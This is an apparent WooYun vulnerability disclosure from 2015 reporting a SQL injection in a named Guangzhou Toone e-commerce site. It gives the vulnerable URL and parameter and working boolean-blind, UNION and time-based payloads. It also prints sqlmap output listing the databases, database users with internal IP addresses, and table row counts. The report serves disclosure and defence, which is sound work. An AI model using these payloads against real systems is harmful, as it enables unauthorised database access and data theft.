当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098406

漏洞标题:广州同望某平台SQL注入

相关厂商:广州同望科技

漏洞作者: 几何黑店

提交时间:2015-02-28 12:25

修复时间:2015-04-14 12:26

公开时间:2015-04-14 12:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

恭喜发财,红包拿来
广州同望科技发展有限公司,是一家国内企业信息化管理平台软件及电子商务平台提供和运营商,公司提供“eTW电子商务管理、CRM营销管理、BMS管理平台、云ERP平台、OA协同办公、HR管理、电子招投标、SCM管理平台”等信息化产品及电商营销解决方案,并提供B2B供应链和分销链体系优化等运营服务,为核心厂商及上下游共生的产业圈提供供应链和分销链的深度整合,从而打造供应链和分销链竞争优势。

详细说明:

http://shop.toone.com/index.php?a=index&g=Home&m=Product&product_type_id=3
参数:product_type_id

Parameter: product_type_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: a=index&g=Home&m=Product&product_type_id=-5509) OR (1212=1212)#
Type: UNION query
Title: MySQL UNION query (81) - 11 columns
Payload: a=index&g=Home&m=Product&product_type_id=-9189) UNION ALL SELECT 81,81,81,81,81,CONCAT(0x71766a6a71,0x63626a595646434c6165,0x716a767071),81,81,81,81,81#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (comment)
Payload: a=index&g=Home&m=Product&product_type_id=3) AND SLEEP(5)#
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] information_schema
[*] mysql
[*] piwik
[*] test
[*] tsmall_1


web application technology: Nginx
back-end DBMS: MySQL 5.0.11
database management system users [17]:
[*] ''@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'tencentroot'@'10.142.5.29'
[*] 'tencentroot'@'10.142.62.18'
[*] 'tencentroot'@'10.142.62.26'
[*] 'tencentroot'@'10.182.27.195'
[*] 'tencentroot'@'10.182.28.55'
[*] 'tencentroot'@'10.207.51.19'
[*] 'tencentroot'@'127.0.0.1'
[*] 'tencentroot'@'20.142.5.29'
[*] 'tencentroot'@'20.142.62.18'
[*] 'tencentroot'@'20.142.62.26'
[*] 'tencentroot'@'20.182.27.195'
[*] 'tencentroot'@'20.182.28.55'
[*] 'tencentroot'@'localhost'

漏洞证明:

Database: tsmall_1
+------------------------------------------+---------+
| Table | Entries |
+------------------------------------------+---------+
| tenc_mall_coupon_send_product | 498844 |
| tenc_mall_process_data | 28647 |
| tenc_mall_process_finished_detail | 24802 |
| tenc_mall_sale_odds | 10783 |
| tenc_mall_coupon_send | 10418 |
| tenc_mall_process_unfinished_detail | 9336 |
| tenc_mall_admin_log | 5040 |
| tenc_mall_orderitem | 4982 |
| tenc_mall_product_link | 4099 |
| tenc_mall_process_manage | 3881 |
| tenc_mall_scansql | 3881 |
| tenc_mall_order_receiver | 3866 |
| tenc_mall_order | 3657 |
| tenc_mall_order_ex | 3642 |
| tenc_mall_order_customer | 3341 |
| tenc_mall_order_invoice | 3213 |
| tenc_mall_agents_user_settlement | 3168 |
| tenc_mall_relevance_confirm_record | 3147 |
| tenc_mall_relevance_close_record | 2977 |
| tenc_mall_coupon_detail | 2825 |
| tenc_mall_relevance_pay_record | 2712 |
| tenc_mall_relevance_logistics_record | 2618 |
| tenc_mall_relevance_invoice_record | 2601 |
| tenc_mall_relevance_audit_record | 2557 |
| tenc_mall_customer | 2515 |
| tenc_mall_coupon_setting_product | 2442 |
| tenc_mall_receiver_info | 2348 |
| tenc_mall_relevance_sendfiles_record | 2306 |
| tenc_mall_user_online | 2075 |
| tenc_mall_agents_userchild_settlement | 2053 |
| tenc_mall_relevance_receiver_record | 1838 |
| tenc_mall_lock | 1531 |
| tenc_mall_income_link | 1520 |
| tenc_mall_income_data | 1419 |
| tenc_mall_score_transfer | 1120 |
| tenc_mall_order_change_record | 988 |
| tenc_mall_rank_record | 883 |
| tenc_mall_saler_customer | 769 |
| tenc_mall_access | 735 |
| tenc_mall_agents_purchase_orderitem | 710 |
| tenc_mall_relevance_lock_record | 626 |
| tenc_mall_favorite | 574 |
| tenc_mall_product_attach | 418 |
| tenc_mall_product | 395 |
| tenc_mall_product_property | 395 |
| tenc_mall_agents_purchase_orderitem_link | 385 |
| tenc_mall_process_status | 338 |
| tenc_mall_agents_product_settlement | 336 |
| tenc_mall_agents_money_credit | 282 |
| tenc_mall_process_setting | 275 |
| tenc_mall_product_account | 256 |
| tenc_mall_coupon_setting | 235 |
| tenc_mall_agents_childproduct_settlement | 231 |
| tenc_mall_agents_purchase_order | 224 |
| tenc_mall_node | 202 |
| tenc_mall_process_setting_bak | 178 |
| tenc_mall_role_user | 152 |
| tenc_mall_temp_history | 97 |
| tenc_mall_order_price_change | 75 |
| tenc_mall_relevance_recoverlock_record | 73 |
| tenc_mall_relevance_oldlock_record | 69 |
| tenc_mall_lock_vcode | 54 |
| tenc_mall_product_type | 42 |
| tenc_mall_role | 39 |
| tenc_mall_process_define | 37 |
| tenc_mall_order_status | 36 |
| tenc_mall_agents_user_targets | 35 |
| tenc_mall_lock_stock | 29 |
| tenc_mall_process_type | 29 |
| tenc_mall_order_transfer | 28 |
| tenc_mall_placard | 16 |
| tenc_mall_paymode | 8 |
| tenc_mall_agents_targets_define | 6 |
| tenc_mall_assignmode | 5 |
| tenc_mall_weibo_dynamic | 5 |
| tenc_mall_agents_partition_pay | 4 |
| tenc_mall_audit_setting | 4 |
| tenc_mall_bank_account | 3 |
| tenc_mall_invoice_type | 2 |
| tenc_mall_relevance_woikzbxnpq_record | 2 |
| tenc_mall_relevance_xsmnlwebyk_record | 2 |
| tenc_mall_relevance_noticqudb_record | 1 |
| tenc_mall_saler_blacklist | 1 |
+------------------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 几何黑店@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝